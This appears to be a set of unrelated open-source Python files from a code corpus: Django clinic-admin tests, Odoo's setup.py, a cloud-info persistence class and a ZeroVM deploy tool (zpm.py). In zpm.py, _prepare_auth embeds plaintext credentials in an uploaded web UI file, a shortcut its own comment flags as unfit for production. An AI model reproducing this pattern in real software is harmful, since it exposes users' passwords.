self.clinic2_user.save()
self.clinic2 = Clinic.objects.create(
name='Clinic 2', user=self.clinic2_user, te_id=uuid4().hex)
self.site = AdminSite()
self.model_admin = self.model_admin_class(self.model_class, self.site)
class VisitAdminTestCase(ClinicAdminTestCase):
model_class = Visit
model_admin_class = VisitAdmin
def test_clinic_queryset_filter(self):
clinic1_patients = [p.te_id for p in
self.create_patients(self.clinic1, count=2)]
clinic2_patients = [p.te_id for p in
self.create_patients(self.clinic2, count=2)]
request_factory = RequestFactory()
request = request_factory.get('/')
request.user = self.clinic1_user
request.session = {}
self.assertTrue(all([v.patient.te_id in clinic1_patients for v in
self.model_admin.queryset(request)]))
self.assertFalse(any([v.patient.te_id in clinic2_patients for v in
self.model_admin.queryset(request)]))
def test_superuser_queryset(self):
clinic1_patients = self.create_patients(self.clinic1, count=2)
clinic2_patients = self.create_patients(self.clinic2, count=2)
all_patients = set([
p.te_id for p in (clinic1_patients + clinic2_patients)])
request_factory = RequestFactory()
request = request_factory.get('/')
request.user = self.admin_user
request.session = {}
self.assertEqual(
all_patients,
set([v.patient.te_id for v in self.model_admin.queryset(request)]))
def test_clinic_form_listing_for_clinic_user(self):
request_factory = RequestFactory()
request = request_factory.get('/')
request.user = self.clinic1_user
request.session = {}
form = self.model_admin.get_form(request)()
self.assertTrue("Clinic 1" in str(form['clinic']))
self.assertFalse("Clinic 2" in str(form['clinic']))
class PatientAdminTestCase(ClinicAdminTestCase):
model_class = Patient
model_admin_class = PatientAdmin
def test_patient_queryset_filter(self):
clinic1_patients = [p.te_id for p in
self.create_patients(self.clinic1, count=2)]
clinic2_patients = [p.te_id for p in
self.create_patients(self.clinic2, count=2)]
request_factory = RequestFactory()
request = request_factory.get('/')
request.user = self.clinic1_user
request.session = {}
self.assertTrue(all([patient.te_id in clinic1_patients for patient in
self.model_admin.queryset(request)]))
self.assertFalse(any([patient.te_id in clinic2_patients for patient in
self.model_admin.queryset(request)]))
def test_superuser_queryset(self):
clinic1_patients = self.create_patients(self.clinic1, count=2)
clinic2_patients = self.create_patients(self.clinic2, count=2)
all_patients = set([
p.te_id for p in (clinic1_patients + clinic2_patients)])
request_factory = RequestFactory()
request = request_factory.get('/')
request.user = self.admin_user
request.session = {}
self.assertEqual(
all_patients,
set([patient.te_id for patient in
self.model_admin.queryset(request)]))
def test_clinic_save_model(self):
[patient] = self.create_patients(self.clinic1, count=1)
self.assertEqual(patient.owner, self.clinic1.user)
other_clinic1_user = User.objects.create_user(
'otherclinic1', 'otherclinic1@clinic1.com',
password='otherclinic1')
other_clinic1_user.groups = [self.clinic1_group]
other_clinic1_user.save()
request_factory = RequestFactory()
request = request_factory.get('/')
request.user = other_clinic1_user
request.session = {}
self.model_admin.save_model(request, patient, None, None)
patient = Patient.objects.get(pk=patient.pk)
self.assertEqual(patient.owner, other_clinic1_user)
def test_superuser_save_model(self):
[patient] = self.create_patients(self.clinic1, count=1)
self.assertEqual(patient.owner, self.clinic1.user)
request_factory = RequestFactory()
request = request_factory.get('/')
request.user = self.admin_user
request.session = {}
self.model_admin.save_model(request, patient, None, None)
patient = Patient.objects.get(pk=patient.pk)
self.assertEqual(patient.owner, self.clinic1.user)
|
praekelt/txtalert
|
txtalert/core/tests/test_clinic_admin.py
|
Python
|
gpl-3.0
| 5,959 | 0 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import re
from glob import glob
from setuptools import find_packages, setup
from os.path import join, dirname
execfile(join(dirname(__file__), 'openerp', 'release.py')) # Load release variables
lib_name = 'openerp'
def py2exe_datafiles():
data_files = {}
data_files['Microsoft.VC90.CRT'] = glob('C:\Microsoft.VC90.CRT\*.*')
for root, dirnames, filenames in os.walk('openerp'):
for filename in filenames:
if not re.match(r'.*(\.pyc|\.pyo|\~)$', filename):
data_files.setdefault(root, []).append(join(root, filename))
import babel
data_files['babel/localedata'] = glob(join(dirname(babel.__file__), 'localedata', '*'))
others = ['global.dat', 'numbers.py', 'support.py', 'plural.py']
data_files['babel'] = map(lambda f: join(dirname(babel.__file__), f), others)
others = ['frontend.py', 'mofile.py']
data_files['babel/messages'] = map(lambda f: join(dirname(babel.__file__), 'messages', f), others)
import pytz
tzdir = dirname(pytz.__file__)
for root, _, filenames in os.walk(join(tzdir, 'zoneinfo')):
base = join('pytz', root[len(tzdir) + 1:])
data_files[base] = [join(root, f) for f in filenames]
import docutils
import passlib
import requests
data_mapping = ((docutils, 'docutils'),
(passlib, 'passlib'),
(requests, 'requests'))
for mod, datadir in data_mapping:
basedir = dirname(mod.__file__)
for root, _, filenames in os.walk(basedir):
base = join(datadir, root[len(basedir) + 1:])
data_files[base] = [join(root, f)
for f in filenames
if not f.endswith(('.py', '.pyc', '.pyo'))]
return data_files.items()
def py2exe_options():
if os.name == 'nt':
import py2exe
return {
'console': [
{'script': 'odoo.py'},
{'script': 'openerp-gevent'},
{'script': 'openerp-server', 'icon_resources': [
(1, join('setup', 'win32', 'static', 'pixmaps', 'openerp-icon.ico'))
]},
],
'options': {
'py2exe': {
'skip_archive': 1,
'optimize': 0, # Keep the assert running as the integrated tests rely on them.
'dist_dir': 'dist',
'packages': [
'asynchat', 'asyncore',
'commands',
'dateutil',
'decimal',
'decorator',
'docutils',
'email',
'encodings',
'HTMLParser',
'imaplib',
'jinja2',
'lxml', 'lxml._elementpath', 'lxml.builder', 'lxml.etree', 'lxml.objectify',
'mako',
'markupsafe',
'mock',
'ofxparse',
'openerp',
'openid',
'passlib',
'PIL',
'poplib',
'psutil',
'pychart',
'pydot',
'pyparsing',
'pyPdf',
'pytz',
'reportlab',
'requests',
'select',
'smtplib',
'suds',
'uuid',
'vatnumber',
'vobject',
'win32service', 'win32serviceutil',
'xlrd',
'xlwt',
'xml', 'xml.dom',
'yaml',
],
'excludes': ['Tkconstants', 'Tkinter', 'tcl'],
}
},
'data_files': py2exe_datafiles()
}
else:
return {}
setup(
name='odoo',
version=version,
description=description,
long_description=long_desc,
url=url,
author=author,
author_email=author_email,
classifiers=filter(None, classifiers.split('\n')),
license=license,
scripts=['openerp-server', 'odoo.py'],
packages=find_packages(),
package_dir={'%s' % lib_name: 'openerp'},
include_package_data=True,
install_requires=[
'babel >= 1.0',
'decorator',
'docutils',
'feedparser',
'gevent',
'Jinja2',
'lxml', # windows binary http://www.lfd.uci.edu/~gohlke/pythonlibs/
'mako',
'mock',
'ofxparse',
'passlib',
'pillow', # windows binary http://www.lfd.uci.edu/~gohlke/pythonlibs/
'psutil', # windows binary code.google.com/p/psutil/downloads/list
'psycogreen',
'psycopg2 >= 2.2',
'python-chart',
'pydot',
'pyparsing',
'pypdf',
'pyserial',
'python-dateutil',
'python-ldap', # optional
'python-openid',
'pytz',
'pyusb >= 1.0.0b1',
'pyyaml',
'qrcode',
'reportlab', # windows binary pypi.python.org/pypi/reportlab
'requests',
'suds-jurko',
'vatnumber',
'vobject',
'werkzeug',
'xlwt',
],
extras_require={
'SSL': ['pyopenssl'],
},
tests_require=[
'mock',
],
**py2exe_options()
)
|
ToiDenGaAli/odoo
|
setup.py
|
Python
|
gpl-3.0
| 5,678 | 0.001585 |
from heat.engine.resources.cloudmanager.util.conf_util import *
class HwsCloudInfoPersist:
def __init__(self, _access_cloud_install_info_file, cloud_id):
self.info_handler = CloudInfoHandler(_access_cloud_install_info_file, cloud_id)
def write_vpc_info(self, vpc_id, vpc_name, vpc_cidr, security_group_id):
vpc_info = {
"id": vpc_id,
"name": vpc_name,
"cidr": vpc_cidr,
"security_group_id": security_group_id
}
self.info_handler.write_unit_info("vpc", vpc_info)
def write_subnets_cidr(self, vpc_cidr,
external_api_cidr,
tunnel_bearing_cidr,
internal_base_cidr,
debug_cidr):
subnets_cidr_info = {
"vpc_cidr": vpc_cidr,
"external_api_cidr": external_api_cidr,
"tunnel_bearing_cidr": tunnel_bearing_cidr,
"internal_base_cidr": internal_base_cidr,
"debug_cidr": debug_cidr
}
self.info_handler.write_unit_info("subnets_cidr", subnets_cidr_info)
def write_subnets_info(self, external_api_subnet, tunnel_bearing_subnet, internal_base_subnet, debug_subnet):
subnets_info = {
"external_api": external_api_subnet,
"tunnel_bearing": tunnel_bearing_subnet,
"internal_base": internal_base_subnet,
"debug": debug_subnet
}
self.info_handler.write_unit_info("subnets", subnets_info)
def write_cascaded_info(self, server_id, public_ip,
external_api_ip,tunnel_bearing_ip,
tunnel_bearing_nic_id, external_api_nic_id,
internal_base_nic_id, port_id_bind_public_ip):
cascaded_info = {"server_id": server_id,
"public_ip": public_ip,
"external_api_ip": external_api_ip,
"tunnel_bearing_ip": tunnel_bearing_ip,
"tunnel_bearing_nic_id":tunnel_bearing_nic_id,
"external_api_nic_id":external_api_nic_id,
"internal_base_nic_id":internal_base_nic_id,
"port_id_bind_public_ip":port_id_bind_public_ip
}
self.info_handler.write_unit_info("cascaded", cascaded_info)
def write_public_ip_info(self, vpn_public_ip,
vpn_public_ip_id,
cascaded_public_ip=None,
cascaded_public_ip_id=None):
public_ip_info = {
"vpn_public_ip": vpn_public_ip,
"vpn_public_ip_id": vpn_public_ip_id,
"cascaded_public_ip": cascaded_public_ip,
"cascaded_public_ip_id": cascaded_public_ip_id
}
self.info_handler.write_unit_info("public_ip", public_ip_info)
def write_vpn(self, server_id, public_ip, external_api_ip, tunnel_bearing_ip):
vpn_info = {"server_id": server_id,
"public_ip": public_ip,
"external_api_ip": external_api_ip,
"tunnel_bearing_ip": tunnel_bearing_ip}
self.info_handler.write_unit_info("vpn", vpn_info)
def write_proxy(self, proxy_info):
self.info_handler.write_unit_info("proxy_info", proxy_info)
def read_proxy(self):
return self.info_handler.get_unit_info("proxy_info")
def write_cloud_info(self, data):
self.info_handler.write_cloud_info(data)
def read_cloud_info(self):
return self.info_handler.read_cloud_info()
def delete_cloud_info(self):
self.info_handler.delete_cloud_info()
def list_all_cloud_id(self):
all_cloud = self.info_handler.get_all_unit_info()
return all_cloud.keys()
def get_cloud_info_with_id(self, cloud_id):
all_cloud = self.info_handler.get_all_unit_info()
if cloud_id in all_cloud.keys():
return all_cloud[cloud_id]
|
hgqislub/hybird-orchard
|
code/cloudmanager/install/hws/hws_cloud_info_persist.py
|
Python
|
apache-2.0
| 3,963 | 0.005804 |
# Copyright 2014 Rackspace, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import fnmatch
import glob
import gzip
import json
import os
import shlex
import sys
import tarfile
try:
import urlparse
except ImportError:
import urllib.parse as urlparse
try:
from cStringIO import StringIO as BytesIO
except ImportError:
from io import BytesIO
import jinja2
import prettytable
import six
import swiftclient
import yaml
import zpmlib
from zpmlib import util
from zpmlib import zappbundler
from zpmlib import zapptemplate
_DEFAULT_UI_TEMPLATES = ['index.html.tmpl', 'style.css', 'zerocloud.js']
_ZAPP_YAML = 'python-zapp.yaml'
_ZAPP_WITH_UI_YAML = 'python-zapp-with-ui.yaml'
LOG = zpmlib.get_logger(__name__)
BUFFER_SIZE = 65536
#: path/filename of the system.map (job description) in every zapp
SYSTEM_MAP_ZAPP_PATH = 'boot/system.map'
#: Message displayed if insufficient auth settings are specified, either on the
#: command line or in environment variables. Shamelessly copied from
#: ``python-swiftclient``.
NO_AUTH_MSG = """\
Auth version 1.0 requires ST_AUTH, ST_USER, and ST_KEY environment variables
to be set or overridden with -A, -U, or -K.
Auth version 2.0 requires OS_AUTH_URL, OS_USERNAME, OS_PASSWORD, and
OS_TENANT_NAME OS_TENANT_ID to be set or overridden with --os-auth-url,
--os-username, --os-password, --os-tenant-name or os-tenant-id. Note:
adding "-V 2" is necessary for this."""
#: Column labels for the execution summary table
EXEC_TABLE_HEADER = [
'Node',
'Status',
'Retcode',
'NodeT',
'SysT',
'UserT',
'DiskReads',
'DiskBytesR',
'DiskWrites',
'DiskBytesW',
'NetworkReads',
'NetworkBytesR',
'NetworkWrites',
'NetworkBytesW',
]
def create_project(location, with_ui=False, template=None):
"""
Create a ZeroVM application project by writing a default `zapp.yaml` in the
specified directory `location`.
:param location:
Directory location to place project files.
:param with_ui:
Defaults to `False`. If `True`, add basic UI template files as well to
``location``.
:param template:
Default: ``None``. If no template is specified, use the default project
template. (See `zpmlib.zapptemplate`.)
:returns: List of created project files.
"""
if os.path.exists(location):
if not os.path.isdir(location):
# target must be an empty directory
raise RuntimeError("Target `location` must be a directory")
else:
os.makedirs(location)
# Run the template builder, and create additional files for the project by
# the type. If ``template`` is none, this is essientially a NOP.
# TODO: just use the afc._created_files
created_files = []
with util.AtomicFileCreator() as afc:
for file_type, path, contents in zapptemplate.template(
location, template, with_ui=with_ui):
afc.create_file(file_type, path, contents)
created_files.append(path)
return created_files
def find_project_root():
"""
Starting from the `cwd`, search up the file system hierarchy until a
``zapp.yaml`` file is found. Once the file is found, return the directory
containing it. If no file is found, raise a `RuntimeError`.
"""
root = os.getcwd()
while not os.path.isfile(os.path.join(root, 'zapp.yaml')):
oldroot, root = root, os.path.dirname(root)
if root == oldroot:
raise RuntimeError("no zapp.yaml file found")
return root
def _generate_job_desc(zapp):
"""
Generate the boot/system.map file contents from the zapp config file.
:param zapp:
`dict` of the contents of a ``zapp.yaml`` file.
:returns:
`dict` of the job description
"""
job = []
# TODO(mg): we should eventually reuse zvsh._nvram_escape
def escape(value):
for c in '\\", \n':
value = value.replace(c, '\\x%02x' % ord(c))
return value
def translate_args(cmdline):
# On Python 2, the yaml module loads non-ASCII strings as
# unicode objects. In Python 2.7.2 and earlier, we must give
# shlex.split a str -- but it is an error to give shlex.split
# a bytes object in Python 3.
need_decode = not isinstance(cmdline, str)
if need_decode:
cmdline = cmdline.encode('utf8')
args = shlex.split(cmdline)
if need_decode:
args = [arg.decode('utf8') for arg in args]
return ' '.join(escape(arg) for arg in args)
for zgroup in zapp['execution']['groups']:
# Copy everything, but handle 'env', 'path', and 'args' specially:
jgroup = dict(zgroup)
path = zgroup['path']
# if path is `file://image:exe`, exec->name is "exe"
# if path is `swift://~/container/obj`, exec->name is "obj"
exec_name = None
if path.startswith('file://'):
exec_name = path.split(':')[-1]
elif path.startswith('swift://'):
# If obj is a pseudo path, like foo/bar/obj, we need to
# handle this as well with a careful split.
# If the object path is something like `swift://~/container/obj`,
# then exec_name will be `obj`.
# If the object path is something like
# `swift://./container/foo/bar/obj`, then the exec_name will be
# `foo/bar/obj`.
exec_name = path.split('/', 4)[-1]
jgroup['exec'] = {
'path': zgroup['path'],
'args': translate_args(zgroup['args']),
}
if exec_name is not None:
jgroup['exec']['name'] = exec_name
del jgroup['path'], jgroup['args']
if 'env' in zgroup:
jgroup['exec']['env'] = zgroup['env']
del jgroup['env']
job.append(jgroup)
return job
def _get_swift_zapp_url(swift_service_url, zapp_path):
"""
:param str swift_service_url:
The Swift service URL returned from a Keystone service catalog.
Example: http://localhost:8080/v1/AUTH_469a9cd20b5a4fc5be9438f66bb5ee04
:param str zapp_path:
<container>/<zapp-file-name>. Example:
test_container/myapp.zapp
Here's a typical usage example, with typical input and output:
>>> swift_service_url = ('http://localhost:8080/v1/'
... 'AUTH_469a9cd20b5a4fc5be9438f66bb5ee04')
>>> zapp_path = 'test_container/myapp.zapp'
>>> _get_swift_zapp_url(swift_service_url, zapp_path)
'swift://AUTH_469a9cd20b5a4fc5be9438f66bb5ee04/test_container/myapp.zapp'
"""
swift_path = urlparse.urlparse(swift_service_url).path
# TODO(larsbutler): Why do we need to check if the path contains '/v1/'?
# This is here due to legacy reasons, but it's not clear to me why this is
# needed.
if swift_path.startswith('/v1/'):
swift_path = swift_path[4:]
return 'swift://%s/%s' % (swift_path, zapp_path)
def _prepare_job(tar, zapp, zapp_swift_url):
"""
:param tar:
The application .zapp file, as a :class:`tarfile.TarFile` object.
:param dict zapp:
Parsed contents of the application `zapp.yaml` specification, as a
`dict`.
:param str zapp_swift_url:
Path of the .zapp in Swift, which looks like this::
'swift://AUTH_abcdef123/test_container/hello.zapp'
See :func:`_get_swift_zapp_url`.
:returns:
Extracted contents of the boot/system.map with the swift
path to the .zapp added to the `devices` for each `group`.
So if the job looks like this::
[{'exec': {'args': 'hello.py', 'path': 'file://python2.7:python'},
'devices': [{'name': 'python2.7'}, {'name': 'stdout'}],
'name': 'hello'}]
the output will look like something like this::
[{'exec': {u'args': 'hello.py', 'path': 'file://python2.7:python'},
'devices': [
{'name': 'python2.7'},
{'name': 'stdout'},
{'name': 'image',
'path': 'swift://AUTH_abcdef123/test_container/hello.zapp'},
],
'name': 'hello'}]
"""
fp = tar.extractfile(SYSTEM_MAP_ZAPP_PATH)
# NOTE(larsbutler): the `decode` is needed for python3
# compatibility
job = json.loads(fp.read().decode('utf-8'))
device = {'name': 'image', 'path': zapp_swift_url}
for group in job:
group['devices'].append(device)
return job
def bundle_project(root, refresh_deps=False):
"""
Bundle the project under root.
"""
zapp_yaml = os.path.join(root, 'zapp.yaml')
zapp = yaml.safe_load(open(zapp_yaml))
zapp_name = zapp['meta']['name'] + '.zapp'
zapp_tar_path = os.path.join(root, zapp_name)
tar = tarfile.open(zapp_tar_path, 'w:gz')
job = _generate_job_desc(zapp)
job_json = json.dumps(job)
info = tarfile.TarInfo(name='boot/system.map')
# This size is only correct because json.dumps uses
# ensure_ascii=True by default and we thus have a 1-1
# correspondence between Unicode characters and bytes.
info.size = len(job_json)
LOG.info('adding %s' % info.name)
# In Python 3, we cannot use a str or bytes object with addfile,
# we need a BytesIO object. In Python 2, BytesIO is just StringIO.
# Since json.dumps produces an ASCII-only Unicode string in Python
# 3, it is safe to encode it to ASCII.
tar.addfile(info, BytesIO(job_json.encode('ascii')))
_add_file_to_tar(root, 'zapp.yaml', tar)
sections = ('bundling', 'ui')
# Keep track of the files we add, given the configuration in the zapp.yaml.
file_add_count = 0
for section in sections:
for pattern in zapp.get(section, []):
paths = glob.glob(os.path.join(root, pattern))
if len(paths) == 0:
LOG.warning(
"pattern '%(pat)s' in section '%(sec)s' matched no files",
dict(pat=pattern, sec=section)
)
else:
for path in paths:
_add_file_to_tar(root, path, tar)
file_add_count += len(paths)
if file_add_count == 0:
# None of the files specified in the "bundling" or "ui" sections were
# found. Something is wrong.
raise zpmlib.ZPMException(
"None of the files specified in the 'bundling' or 'ui' sections of"
" the zapp.yaml matched anything."
)
# Do template-specific bundling
zappbundler.bundle(root, zapp, tar, refresh_deps=refresh_deps)
tar.close()
print('created %s' % zapp_name)
def _add_file_to_tar(root, path, tar, arcname=None):
"""
:param root:
Root working directory.
:param path:
File path.
:param tar:
Open :class:`tarfile.TarFile` object to add the ``files`` to.
"""
# TODO(larsbutler): document ``arcname``
LOG.info('adding %s' % path)
path = os.path.join(root, path)
relpath = os.path.relpath(path, root)
if arcname is None:
# In the archive, give the file the same name and path.
arcname = relpath
tar.add(path, arcname=arcname)
def _find_ui_uploads(zapp, tar):
matches = set()
names = tar.getnames()
for pattern in zapp.get('ui', []):
matches.update(fnmatch.filter(names, pattern))
return sorted(matches)
def _post_job(url, token, data, http_conn=None, response_dict=None,
content_type='application/json', content_length=None,
response_body_buffer=None):
# Modelled after swiftclient.client.post_account.
headers = {'X-Auth-Token': token,
'X-Zerovm-Execute': '1.0',
'Content-Type': content_type}
if content_length:
headers['Content-Length'] = str(content_length)
if http_conn:
parsed, conn = http_conn
else:
parsed, conn = swiftclient.http_connection(url)
conn.request('POST', parsed.path, data, headers)
resp = conn.getresponse()
body = resp.read()
swiftclient.http_log((url, 'POST'), {'headers': headers}, resp, body)
swiftclient.store_response(resp, response_dict)
if response_body_buffer is not None:
response_body_buffer.write(body)
class ZeroCloudConnection(swiftclient.Connection):
"""
An extension of the `swiftclient.Connection` which has the capability of
posting ZeroVM jobs to an instance of ZeroCloud (running on Swift).
"""
def authenticate(self):
"""
Authenticate with the provided credentials and cache the storage URL
and auth token as `self.url` and `self.token`, respectively.
"""
self.url, self.token = self.get_auth()
def post_job(self, job, response_dict=None, response_body_buffer=None):
"""Start a ZeroVM job, using a pre-uploaded zapp
:param object job:
Job description. This will be encoded as JSON and sent to
ZeroCloud.
"""
json_data = json.dumps(job)
LOG.debug('JOB: %s' % json_data)
return self._retry(None, _post_job, json_data,
response_dict=response_dict,
response_body_buffer=response_body_buffer)
def post_zapp(self, data, response_dict=None, content_length=None,
response_body_buffer=None):
return self._retry(None, _post_job, data,
response_dict=response_dict,
content_type='application/x-gzip',
content_length=content_length,
response_body_buffer=response_body_buffer)
def _get_zerocloud_conn(args):
version = args.auth_version
# no version was explicitly requested; try to guess it:
if version is None:
version = _guess_auth_version(args)
if version == '1.0':
if any([arg is None for arg in (args.auth, args.user, args.key)]):
raise zpmlib.ZPMException(
"Version 1 auth requires `--auth`, `--user`, and `--key`."
"\nSee `zpm deploy --help` for more information."
)
conn = ZeroCloudConnection(args.auth, args.user, args.key)
elif version == '2.0':
if any([arg is None for arg in
(args.os_auth_url, args.os_username, args.os_tenant_name,
args.os_password)]):
raise zpmlib.ZPMException(
"Version 2 auth requires `--os-auth-url`, `--os-username`, "
"`--os-password`, and `--os-tenant-name`."
"\nSee `zpm deploy --help` for more information."
)
conn = ZeroCloudConnection(args.os_auth_url, args.os_username,
args.os_password,
tenant_name=args.os_tenant_name,
auth_version='2.0')
else:
raise zpmlib.ZPMException(NO_AUTH_MSG)
return conn
def _deploy_zapp(conn, target, zapp_path, auth_opts, force=False):
"""Upload all of the necessary files for a zapp.
Returns the name an uploaded index file, or the target if no
index.html file was uploaded.
:param bool force:
Force deployment, even if the target container is not empty. This means
that files could be overwritten and could cause consistency problems
with these objects in Swift.
"""
base_container = target.split('/')[0]
try:
_, objects = conn.get_container(base_container)
if not len(objects) == 0:
if not force:
raise zpmlib.ZPMException(
"Target container ('%s') is not empty.\nDeploying to a "
"non-empty container can cause consistency problems with "
"overwritten objects.\nSpecify the flag `--force/-f` to "
"overwrite anyway."
% base_container
)
except swiftclient.exceptions.ClientException:
# container doesn't exist; create it
LOG.info("Container '%s' not found. Creating it...", base_container)
conn.put_container(base_container)
# If we get here, everything with the container is fine.
index = target + '/'
uploads = _generate_uploads(conn, target, zapp_path, auth_opts)
for path, data, content_type in uploads:
if path.endswith('/index.html'):
index = path
container, obj = path.split('/', 1)
conn.put_object(container, obj, data, content_type=content_type)
return index
def _generate_uploads(conn, target, zapp_path, auth_opts):
"""Generate sequence of (container-and-file-path, data, content-type)
tuples.
"""
tar = tarfile.open(zapp_path, 'r:gz')
zapp_config = yaml.safe_load(tar.extractfile('zapp.yaml'))
remote_zapp_path = '%s/%s' % (target, os.path.basename(zapp_path))
swift_url = _get_swift_zapp_url(conn.url, remote_zapp_path)
job = _prepare_job(tar, zapp_config, swift_url)
yield (remote_zapp_path, gzip.open(zapp_path).read(), 'application/x-tar')
yield ('%s/%s' % (target, SYSTEM_MAP_ZAPP_PATH), json.dumps(job),
'application/json')
for path in _find_ui_uploads(zapp_config, tar):
output = tar.extractfile(path).read()
if path.endswith('.tmpl'):
tmpl = jinja2.Template(output.decode('utf-8'))
output = tmpl.render(auth_opts=auth_opts, zapp=zapp_config)
# drop the .tmpl extension
path = os.path.splitext(path)[0]
ui_path = '%s/%s' % (target, path)
yield (ui_path, output, None)
def _prepare_auth(version, args, conn):
"""
:param str version:
Auth version: "0.0", "1.0", or "2.0". "0.0" indicates "no auth".
:param args:
:class:`argparse.Namespace` instance, with attributes representing the
various authentication parameters
:param conn:
:class:`ZeroCloudConnection` instance.
"""
version = str(float(version))
auth = {'version': version}
if version == '0.0':
auth['swiftUrl'] = conn.url
elif version == '1.0':
auth['authUrl'] = args.auth
auth['username'] = args.user
auth['password'] = args.key
else:
# TODO(mg): inserting the username and password in the
# uploaded file makes testing easy, but should not be done in
# production. See issue #46.
auth['authUrl'] = args.os_auth_url
auth['tenant'] = args.os_tenant_name
auth['username'] = args.os_username
auth['password'] = args.os_password
return auth
def _guess_auth_version(args):
"""Guess the auth version from first the command line args and/or envvars.
Command line arguments override environment variables, so we check those
first.
Auth v1 arguments:
* ``--auth``
* ``--user``
* ``--key``
Auth v2 arguments:
* ``--os-auth-url``
* ``--os-username``
* ``--os-password``
* ``--os-tenant-name``
If all of the v1 and v2 arguments are specified, default to 1.0 (this is
how ``python-swiftclient`` behaves).
If no auth version can be determined from the command line args, we check
environment variables.
Auth v1 vars:
* ``ST_AUTH``
* ``ST_USER``
* ``ST_KEY``
Auth v2 vars:
* ``OS_AUTH_URL``
* ``OS_USERNAME``
* ``OS_PASSWORD``
* ``OS_TENANT_NAME``
The same rule above applies; if both sets of variables are specified,
default to 1.0.
If no auth version can be determined, return `None`.
:param args:
:class:`argparse.Namespace`, representing the args specified on the
command line.
:returns: '1.0', '2.0', or ``None``
"""
v1 = (args.auth, args.user, args.key)
v2 = (args.os_auth_url, args.os_username, args.os_password,
args.os_tenant_name)
if all(v1) and not all(v2):
return '1.0'
elif all(v2) and not all(v1):
return '2.0'
elif all(v1) and all(v2):
# All vars for v1 and v2 auth are set, so we follow the
# `python-swiftclient` behavior and default to 1.0.
return '1.0'
else:
# deduce from envvars
env = os.environ
v1_env = (env.get('ST_AUTH'), env.get('ST_USER'), env.get('ST_KEY'))
v2_env = (env.get('OS_AUTH_URL'), env.get('OS_USERNAME'),
env.get('OS_PASSWORD'), env.get('OS_TENANT_NAME'))
if all(v1_env) and not all(v2_env):
return '1.0'
if all(v2_env) and not all(v1_env):
return '2.0'
elif all(v1_env) and all(v2_env):
# Same as above, if all v1 and v2 vars are set, default to 1.0.
return '1.0'
else:
# Insufficient auth details have been specified.
return None
def deploy_project(args):
conn = _get_zerocloud_conn(args)
conn.authenticate()
ui_auth_version = conn.auth_version
# We can now reset the auth for the web UI, if needed
if args.no_ui_auth:
ui_auth_version = '0.0'
auth = _prepare_auth(ui_auth_version, args, conn)
auth_opts = jinja2.Markup(json.dumps(auth))
deploy_index = _deploy_zapp(conn, args.target, args.zapp, auth_opts,
force=args.force)
print('app deployed to\n %s/%s' % (conn.url, deploy_index))
if args.execute:
# for compatibility with the option name in 'zpm execute'
args.container = args.target
resp_body_buffer = BytesIO()
resp = execute(args, response_body_buffer=resp_body_buffer)
resp_body_buffer.seek(0)
if resp['status'] < 200 or resp['status'] >= 300:
raise zpmlib.ZPMException(resp_body_buffer.read())
if args.summary:
total_time, exec_table = _get_exec_table(resp)
print('Execution summary:')
print(exec_table)
print('Total time: %s' % total_time)
sys.stdout.write(resp_body_buffer.read())
def _get_exec_table(resp):
"""Build an execution summary table from a job execution response.
:param dict resp:
Response dictionary from job execution. Must contain a ``headers`` key
at least (and will typically contain ``status`` and ``reason`` as
well).
:returns:
Tuple of total execution time (`str`),
``prettytable.PrettyTable`` containing the summary of all node
executions in the job.
"""
headers = resp['headers']
total_time, table_data = _get_exec_table_data(headers)
table = prettytable.PrettyTable(EXEC_TABLE_HEADER)
for row in table_data:
table.add_row(row)
return total_time, table
def _get_exec_table_data(headers):
"""Extract a stats table from execution HTTP response headers.
Stats include things like node name, execution time, number of
reads/writes, bytes read/written, etc.
:param dict headers:
`dict` of response headers from a job execution request. It must
contain at least ``x-nexe-system``, ``x-nexe-status``,
``x-nexe-retcode``, ``x-nexe-cdr-line``.
:returns:
Tuple of two items. The first is the total time for the executed job
(as a `str`). The second is a table (2d `list`) of execution data
extracted from ``X-Nexe-System`` and ``X-Nexe-Cdr-Line`` headers.
Each row in the table consists of the following data:
* node name
* node time
* system time
* user time
* number of disk reads
* number of bytes read from disk
* number of disk writes
* number of bytes written to disk
* number of network reads
* number of bytes read from network
* number of network writes
* number of bytes written to network
"""
node_names = iter(headers['x-nexe-system'].split(','))
statuses = iter(headers['x-nexe-status'].split(','))
retcodes = iter(headers['x-nexe-retcode'].split(','))
cdr = headers['x-nexe-cdr-line']
cdr_data = [x.strip() for x in cdr.split(',')]
total_time = cdr_data.pop(0)
cdr_data = iter(cdr_data)
def adviter(x):
return six.advance_iterator(x)
table_data = []
while True:
try:
node_name = adviter(node_names)
status = adviter(statuses)
retcode = adviter(retcodes)
node_time = adviter(cdr_data)
cdr = adviter(cdr_data).split()
row = [node_name, status, retcode, node_time] + cdr
table_data.append(row)
except StopIteration:
break
return total_time, table_data
def execute(args, response_body_buffer=None):
"""Execute a zapp remotely on a ZeroCloud deployment.
:returns:
A `dict` with response data, including the keys 'status', 'reason', and
'headers'.
"""
conn = _get_zerocloud_conn(args)
resp = dict()
if args.container:
job_filename = SYSTEM_MAP_ZAPP_PATH
try:
headers, content = conn.get_object(args.container, job_filename)
except swiftclient.ClientException as exc:
if exc.http_status == 404:
raise zpmlib.ZPMException("Could not find %s" % exc.http_path)
else:
raise zpmlib.ZPMException(str(exc))
job = json.loads(content)
conn.post_job(job, response_dict=resp,
response_body_buffer=response_body_buffer)
LOG.debug('RESP STATUS: %s %s', resp['status'], resp['reason'])
LOG.debug('RESP HEADERS: %s', resp['headers'])
else:
size = os.path.getsize(args.zapp)
zapp_file = open(args.zapp, 'rb')
data_reader = iter(lambda: zapp_file.read(BUFFER_SIZE), b'')
conn.post_zapp(data_reader, response_dict=resp, content_length=size,
response_body_buffer=response_body_buffer)
zapp_file.close()
return resp
def auth(args):
conn = _get_zerocloud_conn(args)
conn.authenticate()
print('Auth token: %s' % conn.token)
print('Storage URL: %s' % conn.url)
|
zerovm/zerovm-cli
|
zpmlib/zpm.py
|
Python
|
apache-2.0
| 26,716 | 0 |
#!/usr/bin/env python
###########################################################################
# Copyright (C) 2008-2016 by SukkoPera #
# software@sukkology.net #
# #
# This program is free software; you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
